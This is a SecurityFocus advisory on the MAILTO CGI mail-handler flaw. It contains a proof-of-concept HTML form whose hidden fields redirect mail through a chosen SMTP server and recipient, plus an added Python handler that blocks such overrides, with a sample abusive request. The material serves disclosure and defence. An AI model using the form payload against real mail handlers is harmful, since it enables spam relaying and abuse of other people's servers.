Brian Dorricott MAILTO Unauthorized Mail Server Use Vulnerability

The following example has been provided by http-equiv@excite.com:


<FORM ACTION="HTTP://WWW.MALWARE.COM/CGI-BIN/MAILTO.EXE" METHOD="POST">
<INPUT TYPE="hidden" NAME="sendto" VALUE=billg@bloatedcorp.com>
<INPUT TYPE="hidden" NAME="email" VALUE="hotsuezzz@xxxxxxrated.com">
<INPUT TYPE="hidden" NAME="server" VALUE="smtp.malware.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="SPAM MONGER">
<INPUT TYPE="hidden" NAME="resulturl" VALUE=http://ww.malware.com>

Name: <INPUT NAME="uname" SIZE=30>
Position: <INPUT NAME="title" SIZE=30>
Company: <INPUT NAME="company" SIZE=30>
E-Mail: <INPUT NAME="email" SIZE=30>
Comments:<TEXTAREA name="comments" ROWS=10 COLS=50 SIZE="10"></TEXTAREA>

Press <INPUT TYPE="submit" VALUE="Submit">
Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is Fake">
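
The form above carries the recipient (sendto), SMTP host (server), subject and redirect (resulturl) in hidden fields, so whoever writes the form chooses where the mail goes. The following is an added example, not part of the original advisory or of the MAILTO product: a form-to-mail handler that keeps those values in server-side configuration and rejects any POST that tries to supply them. The function name, configuration values and sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# Routing is fixed on the server and never read from the request
# (constructed values for illustration).
FIXED = {
    "sendto": "webmaster@example.org",
    "server": "smtp.example.org",
    "subject": "Website feedback",
    "resulturl": "https://www.example.org/thanks.html",
}

# Fields a visitor may supply, each with a length cap. They are used only
# in the message body, never as routing or header values.
CONTENT_FIELDS = {"uname": 100, "title": 100, "company": 100,
                  "email": 254, "comments": 4000}


class RejectedSubmission(Exception):
    """Raised when a POST tries to control routing or is ambiguous."""


def build_mail_job(post_body: str) -> dict:
    """Turn a urlencoded form POST into a mail job that uses fixed routing."""
    fields = parse_qs(post_body, keep_blank_values=True)

    # A legitimate form for this handler never sends routing keys, so their
    # presence alone is treated as an override attempt worth logging.
    overrides = sorted(k for k in fields if k.lower() in FIXED)
    if overrides:
        raise RejectedSubmission("client-supplied routing fields: " + ", ".join(overrides))

    body = {}
    for name, values in fields.items():
        if name not in CONTENT_FIELDS:
            continue  # unknown fields are ignored
        if len(values) != 1:
            # The form above submits "email" twice; refuse ambiguous input.
            raise RejectedSubmission("duplicate field: " + name)
        body[name] = values[0][:CONTENT_FIELDS[name]]
    return {**FIXED, "body": body}


# Constructed sample requests: one ordinary, one using the hidden-field
# names and values from the form above.
SAMPLE_OK = "uname=Ann&title=Engineer&company=Example&email=ann%40example.org&comments=Hello"
SAMPLE_ABUSE = "sendto=billg%40bloatedcorp.com&server=smtp.malware.com&subject=SPAM+MONGER&uname=x"
```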


 

Copyright 2010, SecurityFocus